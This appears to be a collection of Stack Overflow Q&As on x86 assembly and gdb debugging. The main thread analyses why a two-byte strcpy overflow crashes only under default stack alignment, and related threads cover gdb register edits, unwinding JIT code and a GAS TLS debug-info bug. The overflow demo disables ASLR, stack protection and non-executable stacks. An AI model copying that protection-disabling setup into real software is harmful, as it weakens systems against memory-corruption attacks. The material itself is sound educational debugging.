Why segmentation fault doesn't occur with smaller stack boundary?

I'm trying to understand the difference in behavior between code compiled with the GCC option -mpreferred-stack-boundary=2 and code compiled with the default, which is -mpreferred-stack-boundary=4.
I have already read many Q&As about this option, but I cannot explain the case described below.
Consider this code:
#include <stdio.h>
#include <string.h>
void dumb_function() {}
int main(int argc, char** argv) {
dumb_function();
char buffer[24];
strcpy(buffer, argv[1]);
return 0;
}
On my 64-bit machine I want to build it for 32 bits, so I use the -m32 option. I create two binaries, one with -mpreferred-stack-boundary=2 and one with the default value:
sysctl -w kernel.randomize_va_space=0
gcc -m32 -g3 -fno-stack-protector -z execstack -o default vuln.c
gcc -mpreferred-stack-boundary=2 -m32 -g3 -fno-stack-protector -z execstack -o align_2 vuln.c
Now, if I run them with an overflow of two bytes, I get a segmentation fault with the default alignment but not in the other case:
$ ./default 1234567890123456789012345
Segmentation fault (core dumped)
$ ./align_2 1234567890123456789012345
$
I tried to dig into why the default build behaves this way. Here is the disassembly of the main function:
08048411 <main>:
8048411: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048415: 83 e4 f0 and $0xfffffff0,%esp
8048418: ff 71 fc pushl -0x4(%ecx)
804841b: 55 push %ebp
804841c: 89 e5 mov %esp,%ebp
804841e: 53 push %ebx
804841f: 51 push %ecx
8048420: 83 ec 20 sub $0x20,%esp
8048423: 89 cb mov %ecx,%ebx
8048425: e8 e1 ff ff ff call 804840b <dumb_function>
804842a: 8b 43 04 mov 0x4(%ebx),%eax
804842d: 83 c0 04 add $0x4,%eax
8048430: 8b 00 mov (%eax),%eax
8048432: 83 ec 08 sub $0x8,%esp
8048435: 50 push %eax
8048436: 8d 45 e0 lea -0x20(%ebp),%eax
8048439: 50 push %eax
804843a: e8 a1 fe ff ff call 80482e0 <strcpy@plt>
804843f: 83 c4 10 add $0x10,%esp
8048442: b8 00 00 00 00 mov $0x0,%eax
8048447: 8d 65 f8 lea -0x8(%ebp),%esp
804844a: 59 pop %ecx
804844b: 5b pop %ebx
804844c: 5d pop %ebp
804844d: 8d 61 fc lea -0x4(%ecx),%esp
8048450: c3 ret
8048451: 66 90 xchg %ax,%ax
8048453: 66 90 xchg %ax,%ax
8048455: 66 90 xchg %ax,%ax
8048457: 66 90 xchg %ax,%ax
8048459: 66 90 xchg %ax,%ax
804845b: 66 90 xchg %ax,%ax
804845d: 66 90 xchg %ax,%ax
804845f: 90 nop
From the sub $0x20,%esp instruction, we can see that the compiler allocates 32 bytes of stack, which is consistent with the -mpreferred-stack-boundary=4 option: 32 is a multiple of 16.
First question: why, if I have 32 bytes of stack (24 bytes for the buffer and the rest junk), do I get a segmentation fault with an overflow of just two bytes?
Let's look at what happens in gdb:
$ gdb default
(gdb) b 10
Breakpoint 1 at 0x804842a: file vuln.c, line 10.
(gdb) b 12
Breakpoint 2 at 0x8048442: file vuln.c, line 12.
(gdb) r 1234567890123456789012345
Starting program: /home/pierre/example/default 1234567890123456789012345
Breakpoint 1, main (argc=2, argv=0xffffce94) at vuln.c:10
10 strcpy(buffer, argv[1]);
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x804842a in main (vuln.c:10); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcde8, args: argc=2, argv=0xffffce94
Locals at 0xffffcde8, Previous frame's sp is 0xffffce00
Saved registers:
ebx at 0xffffcde4, ebp at 0xffffcde8, eip at 0xffffcdfc
(gdb) x/6x buffer
0xffffcdc8: 0xf7e1da60 0x080484ab 0x00000002 0xffffce94
0xffffcdd8: 0xffffcea0 0x08048481
(gdb) x/x buffer+36
0xffffcdec: 0xf7e07647
Just before the call to strcpy, we can see that the saved eip is 0xf7e07647. We can find this value again starting from the buffer address (32 bytes for the stack + 4 bytes for the esp = 36 bytes).
Let's continue:
(gdb) c
Continuing.
Breakpoint 2, main (argc=0, argv=0x0) at vuln.c:12
12 return 0;
(gdb) i f
Stack level 0, frame at 0xffff0035:
eip = 0x8048442 in main (vuln.c:12); saved eip = 0x0
source language c.
Arglist at 0xffffcde8, args: argc=0, argv=0x0
Locals at 0xffffcde8, Previous frame's sp is 0xffff0035
Saved registers:
ebx at 0xffffcde4, ebp at 0xffffcde8, eip at 0xffff0031
(gdb) x/7x buffer
0xffffcdc8: 0x34333231 0x38373635 0x32313039 0x36353433
0xffffcdd8: 0x30393837 0x34333231 0xffff0035
(gdb) x/x buffer+36
0xffffcdec: 0xf7e07647
We can see the overflow in the bytes just after the buffer: 0xffff0035. Also, where the eip was stored, nothing changed: 0xffffcdec: 0xf7e07647, because the overflow is only two bytes. However, the saved eip reported by info frame changed: saved eip = 0x0, and the segmentation fault occurs if I continue:
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
What's happening? Why did my saved eip change when the overflow is only two bytes?
Now, let's compare this with the binary compiled with the other alignment:
$ objdump -d align_2
...
08048411 <main>:
...
8048414: 83 ec 18 sub $0x18,%esp
...
The stack is exactly 24 bytes. That means an overflow of 2 bytes will overwrite the esp (but still not the eip). Let's check that with gdb:
(gdb) b 10
Breakpoint 1 at 0x804841c: file vuln.c, line 10.
(gdb) b 12
Breakpoint 2 at 0x8048431: file vuln.c, line 12.
(gdb) r 1234567890123456789012345
Starting program: /home/pierre/example/align_2 1234567890123456789012345
Breakpoint 1, main (argc=2, argv=0xffffce94) at vuln.c:10
10 strcpy(buffer, argv[1]);
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x804841c in main (vuln.c:10); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcdf8, args: argc=2, argv=0xffffce94
Locals at 0xffffcdf8, Previous frame's sp is 0xffffce00
Saved registers:
ebp at 0xffffcdf8, eip at 0xffffcdfc
(gdb) x/6x buffer
0xffffcde0: 0xf7fa23dc 0x080481fc 0x08048449 0x00000000
0xffffcdf0: 0xf7fa2000 0xf7fa2000
(gdb) x/x buffer+28
0xffffcdfc: 0xf7e07647
(gdb) c
Continuing.
Breakpoint 2, main (argc=2, argv=0xffffce94) at vuln.c:12
12 return 0;
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x8048431 in main (vuln.c:12); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcdf8, args: argc=2, argv=0xffffce94
Locals at 0xffffcdf8, Previous frame's sp is 0xffffce00
Saved registers:
ebp at 0xffffcdf8, eip at 0xffffcdfc
(gdb) x/7x buffer
0xffffcde0: 0x34333231 0x38373635 0x32313039 0x36353433
0xffffcdf0: 0x30393837 0x34333231 0x00000035
(gdb) x/x buffer+28
0xffffcdfc: 0xf7e07647
(gdb) c
Continuing.
[Inferior 1 (process 6118) exited normally]
As expected, no segmentation fault here because I don't overwrite the eip.
I don't understand this difference in behavior. In both cases, the eip is not overwritten. The only difference is the size of the stack. What's happening?
Additional information:
This behavior doesn't occur if dumb_function is not present.
I'm using the following version of GCC:
$ gcc -v
gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)
Some information about my system:
$ uname -a
Linux pierre-Inspiron-5567 4.15.0-107-generic #108~16.04.1-Ubuntu SMP Fri Jun 12 02:57:13 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

You're not overwriting the saved eip, it's true. But you are overwriting a pointer that the function is using to find the saved eip. You can actually see this in your i f output; look at "Previous frame's sp" and notice how the two low bytes are 00 35; ASCII 0x35 is 5 and 00 is the terminating null. So although the saved eip is perfectly intact, the machine is fetching its return address from somewhere else, thus the crash.
In more detail:
GCC apparently doesn't trust the startup code to align the stack to 16 bytes, so it takes matters into its own hands (and $0xfffffff0,%esp). But it needs to keep track of the previous stack pointer value, so that it can find its parameters and the return address when needed. This is the lea 0x4(%esp),%ecx, which loads ecx with the address of the dword just above the saved eip on the stack. gdb calls this address "Previous frame's sp", I guess because it was the value of the stack pointer immediately before the caller executed its call main instruction. I will call it P for short.
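After aligning the stack, the compiler pushes -0x4(%ecx), which is a copy of the return address (ecx is the entry esp plus 4, so -0x4(%ecx) is the slot that the caller's call instruction filled). This keeps the realigned frame in the conventional shape, with a return address directly above the saved ebp. That copy, at 0xffffcdec, is what your x/x buffer+36 displays, which is why it never changes; the return address that ret will actually use is the original one at 0xffffcdfc. Then it sets up its stack frame with push %ebp; mov %esp, %ebp. We can keep track of all addresses relative to %ebp from now on, in the way compilers usually do when not optimizing.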
The push %ecx a couple lines down stores the address P on the stack at offset -0x8(%ebp). The sub $0x20, %esp makes 32 more bytes of space on the stack (ending at -0x28(%ebp)), but the question is, where in that space does buffer end up being placed? We see it happen after the call to dumb_function, with lea -0x20(%ebp), %eax; push %eax; this is the first argument to strcpy being pushed, which is buffer, so indeed buffer is at -0x20(%ebp), not at -0x28 as you might have guessed. The 24 (=0x18) bytes of buffer therefore end exactly at -0x8(%ebp), and the two extra bytes you write land at -0x8(%ebp), on top of the low two bytes of our stored P pointer.
It's all downhill from here. The corrupted value of P (call it Px) is popped into ecx, and just before the return, we do lea -0x4(%ecx), %esp. Now %esp is garbage and points somewhere bad, so the following ret is sure to lead to trouble. Maybe Px points to unmapped memory and just attempting to fetch the return address from there causes the fault. Maybe it points to readable memory, but the address fetched from that location does not point to executable memory, so the control transfer faults. Maybe the latter does point to executable memory, but the instructions located there are not the ones we want to be executing.
If you take out the call to dumb_function(), the stack layout changes slightly. It's no longer necessary to push ebx around the call to dumb_function(), so the P pointer from ecx now winds up at -4(%ebp), there are 4 bytes of unused space (to maintain alignment), and then buffer is at -0x20(%ebp). So your two-byte overrun goes into space that's not used at all, hence no crash.
With -mpreferred-stack-boundary=2, there is no need to re-align the stack, because the compiler does trust the startup code to align the stack to at least 4 bytes (it would be unthinkable for this not to be the case). The stack layout is simpler: push ebp, and subtract 24 more bytes for buffer. Thus your overrun overwrites two bytes of the saved ebp. This is eventually popped from the stack back into ebp, and so main returns to its caller with a value in ebp that is not the same as on entry. That's naughty, but it so happens that the system startup code doesn't use the value in ebp for anything (indeed in my tests it is set to 0 on entry to main, likely to mark the top of the stack for backtraces), and so nothing bad happens afterwards.

Related

Change on rax register during debug session with gdb does not affect code execution

I'm planning to participate in some Capture the Flag (CTF) challenges in the near future. For that reason, I've decided to study assembly. For now I'm focusing on how the CPU registers are used. Following some examples that I found on the internet, I tried to debug a very simple "Hello World" program written in C, to see how the CPU registers are used. My environment is Linux and GCC version 11. I compiled my code with the -g flag to include debug symbols.
Following is my very simple C source code:
#include <cstdio>
int main (int argc, char** argv)
{
char message_c_str[] = "Hello World from C!";
printf("%s\n", message_c_str);
return 0;
}
Studying the disassembly of the main function, I understand that the string containing the message gets stored inside the RAX (and RDX registers?), before calling the printf function:
└─$ objdump -M intel -D main| grep -A20 main.:
0000000000001159 <main>:
1159: 55 push rbp
115a: 48 89 e5 mov rbp,rsp
115d: 48 83 ec 30 sub rsp,0x30
1161: 89 7d dc mov DWORD PTR [rbp-0x24],edi
1164: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi
1168: 48 b8 48 65 6c 6c 6f movabs rax,0x6f57206f6c6c6548
116f: 20 57 6f
1172: 48 ba 72 6c 64 20 66 movabs rdx,0x6d6f726620646c72
1179: 72 6f 6d
117c: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax
1180: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx
1184: c7 45 f0 20 43 21 00 mov DWORD PTR [rbp-0x10],0x214320
118b: 48 8d 45 e0 lea rax,[rbp-0x20]
118f: 48 89 c7 mov rdi,rax
1192: e8 b9 fe ff ff call 1050 <puts@plt>
1197: b8 00 00 00 00 mov eax,0x0
119c: c9 leave
119d: c3 ret
I decided to start a debug session and change RAX on the fly, just to see whether I could change the string content before it is printed on the command line. Unfortunately, even though it seems that I can change the RAX value, the program still prints the hard-coded message, and I'm not sure why. Am I forgetting to run some gdb command after updating the value of RAX?
Following is my debug session with the issue:
┌──(alexis㉿kali)-[~/Desktop/Hacking/hello_world]
└─$ gdb -q main
Reading symbols from main...
(gdb) break main
Breakpoint 1 at 0x1168: file /home/alexis/Desktop/Hacking/hello_world/main.cpp, line 5.
(gdb) run
Starting program: /home/alexis/Desktop/Hacking/hello_world/main
Breakpoint 1, main (argc=1, argv=0x7fffffffdf58) at
/home/alexis/Desktop/Hacking/hello_world/main.cpp:5
5 char message_c_str[] = "Hello World from C!";
(gdb) info register rax
rax 0x555555555159 93824992235865
(gdb) next
6 printf("%s\n", message_c_str);
(gdb) info register rax
rax 0x6f57206f6c6c6548 8022916924116329800
(gdb) set $rax=0x6361636361
(gdb) info register rax
rax 0x6361636361 426835665761
(gdb) next
Hello World from C!
8 return 0;
(gdb)
You can see that the code still prints "Hello World from C!", even if the RAX register changed. Why?

The string is only temporarily in rax+rdx. In the following lines it is placed on the stack and the address goes to rdi, that is used by puts.
What's important here is to understand that one line of source code is translated to multiple lines of assembly. When you change the rax on line printf("%s\n", message_c_str); the string is already pushed on the stack and rax only keeps an old value as it wasn't overwritten by anything. It is no longer the string that's being printed.
To accomplish your goal you would have to change the string on the stack or change it in rax before it's being pushed onto it (so before your next command).
Also be aware that next advances one source code line. If you want to advance by one assembly instruction, use nexti; that gives you more control over what gets executed.

You're using next (whole block of asm corresponding to a C source line), not nexti or stepi (aka ni or si) to step by asm instruction.
And you made a debug build so GCC doesn't keep anything in registers across C statements. The points where execution stops with next are the ones where the compiler-generated instructions are about to load or LEA a new RAX, so its current value is dead and doesn't matter.
(And it's only using RAX at all because it's a debug build with GCC; otherwise things like lea rax,[rbp-0x20] / mov rdi,rax would LEA straight into RDI, instead of uselessly using RAX as a temporary. See the related Q&A "Return value from writing an unused parameter when falling off the end of a non-void function". As for the mov-immediate to memory, there's no mov r/m64, imm64, only to a register, so those moves to RAX and RDX do make sense.)
If you wanted to have it print something different, you could si until after movabs rax,0x6f57206f6c6c6548 but before mov QWORD PTR [rbp-0x20],rax, and at that point change the initializer for part of the string data. (Which is in RAX at that point.) e.g. introducing a 0x00 byte will terminate the C string.
Or right before the call puts, you could set $rdi = $rdi+5 to be like puts(message_c_str + 5).
layout reg or layout asm (use layout next / prev to fix the display if it's broken) are helpful for seeing where execution is. See other GDB asm tips at the bottom of https://stackoverflow.com/tags/x86/info

How to use gdb stacktrace with run time generated machine code?

I've inherited some clever x64 machine code for GNU/Linux that creates a machine code wrapper around a c-function call. I guess that in higher language terms the code might be called a decorator or a closure. The code is functioning well, but with the unfortunate artifact that when the wrapper is called, it gobbles the stack trace in gdb.
From what I have learned from the net gdb uses https://en.wikipedia.org/wiki/DWARF as a guide for separating the stack frames in the stack. This works well for static code, but obviously code generated and called at run time isn't registered in the DWARF framework.
My question is if there is any way to rescue the stack trace in this situation?
Here is some similar c-code that shows the problem.
typedef int (*ftype)(int x);
int wuz(int x) { return x + 7; }
int wbar(int x) { return wuz(x)+5; }
int main(int argc, char **argv)
{
const unsigned char wbarcode[] = {
0x55 , // push %rbp
0x48,0x89,0xe5 , // mov %rsp,%rbp
0x48,0x83,0xec,0x08 , // sub $0x8,%rsp
0x89,0x7d,0xfc , // mov %edi,-0x4(%rbp)
0x8b,0x45,0xfc , // mov -0x4(%rbp),%eax
0x89,0xc7 , // mov %eax,%edi
0x48,0xc7,0xc0,0xf6,0x04,0x40,0x00, // mov $0x4004f6,%rax
0xff,0xd0, // callq *%rax
0x83,0xc0,0x05 , // add $0x5,%eax
0xc9 , // leaveq
0xc3 // retq
};
int wb = wbar(5);
ftype wf = (ftype)wbarcode;
int fwb = wf(5);
}
Compile it by:
gcc -g -o mcode mcode.c
execstack -s mcode
and run it in gdb by:
$ gdb mcode
(gdb) break wuz
If we disassemble wbar we get something very similar to the byte sequence in wbarcode[]. The only difference is that I changed the calling convention for calling wuz().
(gdb) disas/r wbar
Dump of assembler code for function wbar:
0x0000000000400505 <+0>: 55 push %rbp
0x0000000000400506 <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000400509 <+4>: 48 83 ec 08 sub $0x8,%rsp
0x000000000040050d <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x0000000000400510 <+11>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400513 <+14>: 89 c7 mov %eax,%edi
0x0000000000400515 <+16>: e8 dc ff ff ff callq 0x4004f6 <wuz>
0x000000000040051a <+21>: 83 c0 05 add $0x5,%eax
0x000000000040051d <+24>: c9 leaveq
0x000000000040051e <+25>: c3 retq
End of assembler dump.
If we now run the program it will stop twice in wuz(). The first time is through our C call, and we can ask for a stack trace with bt.
Breakpoint 3, wuz (x=5) at mcode.c:2
=> 0x00000000004004fd <wuz+7>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400500 <wuz+10>: 83 c0 07 add $0x7,%eax
0x0000000000400503 <wuz+13>: 5d pop %rbp
0x0000000000400504 <wuz+14>: c3 retq
(gdb) bt
#0 wuz (x=5) at mcode.c:2
#1 0x000000000040051a in wbar (x=5) at mcode.c:3
#2 0x00000000004005b0 in main (argc=1, argv=0x7fffffffe528) at mcode.c:20
This is a normal stack trace showing that we got from main() → wbar() → wuz().
But if we now continue we reach wuz() a second time, and we again request a stack trace:
(gdb) c
Continuing.
Breakpoint 3, wuz (x=5) at mcode.c:2
=> 0x00000000004004fd <wuz+7>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400500 <wuz+10>: 83 c0 07 add $0x7,%eax
0x0000000000400503 <wuz+13>: 5d pop %rbp
0x0000000000400504 <wuz+14>: c3 retq
(gdb) bt
#0 wuz (x=5) at mcode.c:2
#1 0x00007fffffffe419 in ?? ()
#2 0x0000000500000001 in ?? ()
#3 0x00007fffffffe440 in ?? ()
#4 0x00000000004005c6 in main (argc=0, argv=0xffffffff) at mcode.c:22
Backtrace stopped: frame did not save the PC
Even though we have made the same two nested calls, we get a stack trace that contains the wrong frames. In my original inherited wrapper code the situation was even worse, as the stack trace ended after 5 frames with the top level having address 0.
So the question is again: is there any extra code that can be added to wbarcode[] that will cause gdb to output a valid stack trace? Or is there any other run-time technique that can be used to make gdb recognize the stack frames?

On some architectures, you can just make the frame have the layout that is expected by gdb's default unwinder for that port. However, this isn't available on all architectures. Reading the x86-64 port (see gdb/amd64-tdep.c, in particular the function amd64_frame_cache_1), I think here gdb wants to know the function bounds, so it can try to analyze the prologue. But, the function bounds come from the (ELF) symbol table, so you're out of luck there.
There's still a way, though. Due to the recent (in gdb terms) rise of JIT compilers, gdb provides three other ways to deal with this problem.
One way is that your program can emit a special ELF object (really any object format that gdb understands, IIRC) in memory, and call a runtime hook to inform gdb of its existence. gdb will read this object, including any debug information it contains. This approach is rather heavy, but gives access to most of gdb's capabilities -- you can specify not just the unwinding but also types, local variables, etc.
A second way is somewhat similar. Your program still calls a special hook. However, you also provide a plugin that is loaded by gdb. This plugin can read symbols and other information from the inferior, but in this case the symbols and unwind information don't have to be in any particular format.
The final way (new in gdb 7.10) is that you can write an unwinder in Python. When working on my JIT unwinder, I chose this approach because it is simple to debug, simple to deploy, reasonably flexible, and does not require any particular changes in the inferior.
These methods are all documented in the gdb manual. In some cases, though, I think the documentation leaves a bit to be desired. You may have to find some example code or dig into the gdb sources to really understand how it's supposed to work.

Program compiled with -fPIC crashes while stepping over thread-local variable in GDB

This is a very strange problem which occurs only when the program is compiled with -fPIC option.
Using gdb I'm able to print thread local variables but stepping over them leads to crash.
thread.c
#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#define MAX_NUMBER_OF_THREADS 2
struct mystruct {
int x;
int y;
};
__thread struct mystruct obj;
void* threadMain(void *args) {
obj.x = 1;
obj.y = 2;
printf("obj.x = %d\n", obj.x);
printf("obj.y = %d\n", obj.y);
return NULL;
}
int main(int argc, char *arg[]) {
pthread_t tid[MAX_NUMBER_OF_THREADS];
int i = 0;
for(i = 0; i < MAX_NUMBER_OF_THREADS; i++) {
pthread_create(&tid[i], NULL, threadMain, NULL);
}
for(i = 0; i < MAX_NUMBER_OF_THREADS; i++) {
pthread_join(tid[i], NULL);
}
return 0;
}
Compile it using the following: gcc -g -lpthread thread.c -o thread -fPIC
Then while debugging it: gdb ./thread
(gdb) b threadMain
Breakpoint 1 at 0x4006a5: file thread.c, line 15.
(gdb) r
Starting program: /junk/test/thread
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
[New Thread 0x7ffff7fc7700 (LWP 31297)]
[Switching to Thread 0x7ffff7fc7700 (LWP 31297)]
Breakpoint 1, threadMain (args=0x0) at thread.c:15
15 obj.x = 1;
(gdb) p obj.x
$1 = 0
(gdb) n
Program received signal SIGSEGV, Segmentation fault.
threadMain (args=0x0) at thread.c:15
15 obj.x = 1;
Although, if I compile it without -fPIC then this problem doesn't occur.
Before anybody asks me why am I using -fPIC, this is just a reduced test case. We have a huge component which compiles into a so file which then plugs into another component. Therefore, fPIC is necessary.
There is no functional impact because of it, only that debugging is near impossible.
Platform Information: Linux 2.6.32-431.el6.x86_64 #1 SMP Sun Nov 10 22:19:54 EST 2013 x86_64 x86_64 x86_64 GNU/Linux, Red Hat Enterprise Linux Server release 6.5 (Santiago)
Reproducible on the following as well
Linux 3.13.0-66-generic #108-Ubuntu SMP Wed Oct 7 15:20:27
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
gcc (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4

The problem lies deep in the bowels of GAS, the GNU assembler, and how it generates DWARF debug information.
The compiler, GCC, has the responsibility of generating a specific sequence of instructions for a position-independent thread-local access, which is documented in the document ELF Handling for Thread-Local Storage, page 22, section 4.1.6: x86-64 General Dynamic TLS Model. This sequence is:
0x00 .byte 0x66
0x01 leaq x@tlsgd(%rip),%rdi
0x08 .word 0x6666
0x0a rex64
0x0b call __tls_get_addr@plt
, and is the way it is because the 16 bytes it occupies leave space for backend/assembler/linker optimizations. Indeed, your compiler generates the following assembler for threadMain():
threadMain:
.LFB2:
.file 1 "thread.c"
.loc 1 14 0
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $16, %rsp
movq %rdi, -8(%rbp)
.loc 1 15 0
.byte 0x66
leaq obj@tlsgd(%rip), %rdi
.value 0x6666
rex64
call __tls_get_addr@PLT
movl $1, (%rax)
.loc 1 16 0
...
The assembler, GAS, then relaxes this code, which contains a function call (!), down to just two instructions. These are:
a mov having an fs:-segment override, and
a lea
, in the final assembly. They occupy between themselves 16 bytes in total, demonstrating why the General Dynamic Model instruction sequence is designed to require 16 bytes.
(gdb) disas/r threadMain
Dump of assembler code for function threadMain:
0x00000000004007f0 <+0>: 55 push %rbp
0x00000000004007f1 <+1>: 48 89 e5 mov %rsp,%rbp
0x00000000004007f4 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x00000000004007f8 <+8>: 48 89 7d f8 mov %rdi,-0x8(%rbp)
0x00000000004007fc <+12>: 64 48 8b 04 25 00 00 00 00 mov %fs:0x0,%rax
0x0000000000400805 <+21>: 48 8d 80 f8 ff ff ff lea -0x8(%rax),%rax
0x000000000040080c <+28>: c7 00 01 00 00 00 movl $0x1,(%rax)
So far, everything has been done correctly. The problem now begins as GAS generates DWARF debug information for your particular assembler code.
While parsing line-by-line in binutils-x.y.z/gas/read.c, function void read_a_source_file (char *name), GAS encounters .loc 1 15 0, the statement that begins the next line, and runs the handler void dwarf2_directive_loc (int dummy ATTRIBUTE_UNUSED) in dwarf2dbg.c. Unfortunately, the handler does not unconditionally emit debug information for the current offset within the "fragment" (frag_now) of machine code it is currently building. It could have done this by calling dwarf2_emit_insn(0), but the .loc handler currently only does so if it sees multiple .loc directives consecutively. Instead, in our case it continues on to the next line, leaving the debug information unemitted.
On the next line it sees the .byte 0x66 directive of the General Dynamic sequence. This is not, in and of itself, part of an instruction, despite representing the data16 instruction prefix in x86 assembly. GAS acts upon it with the handler cons_worker(), and the fragment increases from 12 bytes to 13 in size.
On the next line it sees a true instruction, leaq, which is parsed by calling the macro assemble_one() that maps to void md_assemble (char *line) in gas/config/tc-i386.c. At the very end of that function, output_insn() is called, which itself finally calls dwarf2_emit_insn(0) and causes debug information to be emitted at last. A new Line Number Statement (LNS) is begun that claims that line 15 began at function-start-address plus previous fragment size, but since we passed over the .byte statement before doing so, the fragment is 1 byte too large, and the computed offset for the first instruction of line 15 is therefore 1 byte off.
Some time later GAS relaxes the General Dynamic sequence to the final instruction sequence that starts with mov %fs:0x0,%rax. The code size and all offsets remain unchanged because both sequences of instructions are 16 bytes. The debug information is unchanged, and still wrong.
GDB, when it reads the Line Number Statements, is told that the prologue of threadMain(), which is associated with the line 14 on which is found its signature, ends where line 15 begins. GDB dutifully plants a breakpoint at that location, but unfortunately it is 1 byte too far.
When run without a breakpoint, the program runs normally, and sees
64 48 8b 04 25 00 00 00 00 mov %fs:0x0,%rax
. Correctly placing the breakpoint would involve saving and replacing the first byte of an instruction with int3 (opcode 0xcc), leaving
cc int3
48 8b 04 25 00 00 00 00 mov (0x0),%rax
. The normal step-over sequence would then involve restoring the first byte of the instruction, setting the program counter (rip on x86-64) to the address of that breakpoint, single-stepping, re-inserting the breakpoint, then continuing the program.
However, when GDB plants the breakpoint at the incorrect address 1 byte too far, the program sees instead
64 cc fs:int3
8b 04 25 00 00 00 00 <garbage>
which is a weird but still valid breakpoint. That's why you didn't see SIGILL (illegal instruction).
Now, when GDB attempts to step over, it restores the instruction byte, sets the PC to the address of the breakpoint, and this is what it sees now:
64 fs: # CPU DOESN'T SEE THIS!
48 8b 04 25 00 00 00 00 mov (0x0),%rax # <- CPU EXECUTES STARTING HERE!
# BOOM! SEGFAULT!
Because GDB restarted execution one byte too far, the CPU does not decode the fs: instruction prefix byte, and instead executes mov (0x0),%rax with the default segment, which is ds: (data). This immediately results in a read from address 0, the null pointer. The SIGSEGV promptly follows.
All due credits to Mark Plotnick for essentially nailing this.
The solution that was retained is to binary-patch cc1, gcc's actual C compiler, to emit data16 instead of .byte 0x66. This results in GAS parsing the prefix and instruction combination as a single unit, yielding the correct offset in the debug information.

Why does initializing a variable `i` to 0 and to a large size result in the same size of the program?

There is a problem which confuses me a lot.
int main(int argc, char *argv[])
{
int i = 12345678;
return 0;
}
int main(int argc, char *argv[])
{
int i = 0;
return 0;
}
The programs have the same bytes in total. Why?
And where is the literal value actually stored? In the text segment or somewhere else?

The programs have the same bytes in total. Why?
There are two possibilities:
1. The compiler is optimizing out the variable. It isn't used anywhere, so there is no point in keeping it.
2. If 1. doesn't apply, the program sizes are equal anyway. Why shouldn't they be? 0 is just as large as 12345678. Two variables of type T occupy the same amount of memory.
And where is the literal value actually stored?
On the stack. Local variables are commonly stored on the stack.

Consider your bedroom. Whether you fill it with stuff or leave it empty, does that change the area of your bedroom?
The size of an int is sizeof(int). It does not matter what value you store in it.

Because your program is optimized. At compile time, the compiler found out that i was useless and removed it.
If optimization didn't occur, another simple explanation is that an int is the same size as any other int.

TL;DR
First question: They're the same size because the instructions generated for your programs are roughly the same (more on that below). Further, they're the same size because the size (number of bytes) of your ints never changes.
Second question: the variable i is stored in your local-variable frame, which is on the function's stack. The actual value you assign to i is in the instructions (hardcoded) in the text segment.
GDB and Assembly
I know you're using Windows, but consider this code and output on Linux. I used exactly the same sources you posted.
For the first one, with i = 12345678, the actual main function is these computer instructions:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>: movl $0xbc614e,-0x4(%rbp)
0x00000000004004ff <+18>: mov $0x0,%eax
0x0000000000400504 <+23>: pop %rbp
0x0000000000400505 <+24>: retq
End of assembler dump.
As for the other program, with i = 0, main is:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>:movl $0x0,-0x4(%rbp)
0x00000000004004ff <+18>:mov $0x0,%eax
0x0000000000400504 <+23>:pop %rbp
0x0000000000400505 <+24>:retq
End of assembler dump.
The only difference between the two is the actual value being stored in your variable. Let's go step by step through the lines below (my computer is x86_64, so if your architecture is different, the instructions may differ).
OPCODES
And the actual instructions of main (using objdump):
00000000004004ed <main>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d ec mov %edi,-0x14(%rbp)
4004f4: 48 89 75 e0 mov %rsi,-0x20(%rbp)
4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
4004ff: b8 00 00 00 00 mov $0x0,%eax
400504: 5d pop %rbp
400505: c3 retq
400506: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40050d: 00 00 00
To get the actual difference in bytes, run objdump -D prog1 > prog1_dump and objdump -D prog2 > prog2_dump, and then diff prog1_dump prog2_dump:
2c2
< draft1: file format elf64-x86-64
---
> draft2: file format elf64-x86-64
51,58c51,58
< 400283: 00 bc f6 06 64 9f ba add %bh,-0x45609bfa(%rsi,%rsi,8)
< 40028a: 01 3b add %edi,(%rbx)
< 40028c: 14 d1 adc $0xd1,%al
< 40028e: 12 cf adc %bh,%cl
< 400290: cd 2e int $0x2e
< 400292: 11 77 5d adc %esi,0x5d(%rdi)
< 400295: 79 fe jns 400295 <_init-0x113>
< 400297: 3b .byte 0x3b
---
> 400283: 00 e8 add %ch,%al
> 400285: f1 icebp
> 400286: 6e outsb %ds:(%rsi),(%dx)
> 400287: 8a f8 mov %al,%bh
> 400289: a8 05 test $0x5,%al
> 40028b: ab stos %eax,%es:(%rdi)
